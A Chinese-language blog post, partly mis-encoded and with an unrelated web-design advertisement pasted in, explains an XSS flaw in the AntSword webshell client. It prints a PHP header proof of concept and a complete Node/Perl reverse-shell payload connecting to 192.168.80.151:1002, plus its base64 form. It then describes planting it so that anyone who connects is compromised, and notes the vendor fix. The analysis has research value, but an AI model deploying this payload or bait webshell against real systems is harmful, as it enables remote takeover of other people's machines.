今日在github上看到蟻劍暴露了一個(gè)xss漏洞，自己也經(jīng)常使用蟻劍。同時(shí)在freebuf上也有一篇文章，關(guān)于蟻劍漏洞的。閑著沒事測(cè)試了一波。

創(chuàng)新互聯(lián)-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價(jià)比定遠(yuǎn)網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式定遠(yuǎn)網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們，業(yè)務(wù)覆蓋定遠(yuǎn)地區(qū)。費(fèi)用合理售后完善，十年實(shí)體公司更值得信賴。

一、漏洞成因

蟻劍shell遠(yuǎn)程連接失敗時(shí)，蟻劍會(huì)返回錯(cuò)誤信息，但因?yàn)槭褂玫氖莌tml解析，導(dǎo)致xss漏洞。

用過蟻劍的童靴都清楚，當(dāng)我們遠(yuǎn)程連接寫好的webshell的時(shí)候，有時(shí)候可能因?yàn)閟hell書寫錯(cuò)誤或者鏈接填寫不當(dāng)?shù)臅r(shí)候，會(huì)出現(xiàn)大堆的錯(cuò)誤代碼。

該信息并沒有進(jìn)行 XSS 保護(hù)，因此能夠利用 js 調(diào)用 perl 便可反彈***者的shell

很多時(shí)候我們不去注意，但這里恰恰就是漏洞利用點(diǎn)。（漏洞往往就在你的眼皮地下，你只要向下看看就能找到。可惜我們只向前看，不向下看。）

二、漏洞驗(yàn)證

鑒于本人對(duì)js沒有深入了解，只懂得些皮毛。這里就直接引用別人寫好的shell了

（1）驗(yàn)證xss漏洞的存在

<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');?>

Head()函數(shù)，向客戶端發(fā)送原始的 HTTP 報(bào)頭。
當(dāng)蟻劍遠(yuǎn)程連接shell的時(shí)候就會(huì)觸發(fā)彈框。

（2）反彈***者shell

require('child_process').exec('perl -e \'use Socket;$i="192.168.80.151";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });

將這些代碼進(jìn)行base64加密

cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

構(gòu)造header

");
?>

將其寫入被***中的網(wǎng)站目錄下

被***機(jī)監(jiān)聽1002端口

***機(jī)蟻劍遠(yuǎn)程連接

獲得***者shell

在最新的版本中， 修改了 toastr 可以輸出 html 的特點(diǎn)，以后均不支持輸出 html。建議及時(shí)更新到最新版本

三、總結(jié)

如果你檢測(cè)到了自己被上傳了webshell，不妨可以試一試這個(gè)漏洞，對(duì)方如果使用的是蟻劍，當(dāng)對(duì)方連接你的時(shí)候，也是他上線的時(shí)候?；蛘咴诒荣悾▃hen shi）環(huán)境的時(shí)候，故意制造一個(gè)這樣的shell，誘惑一些小可愛連一下。

參考鏈接：
https://github.com/AntSwordProject/antSword/issues/147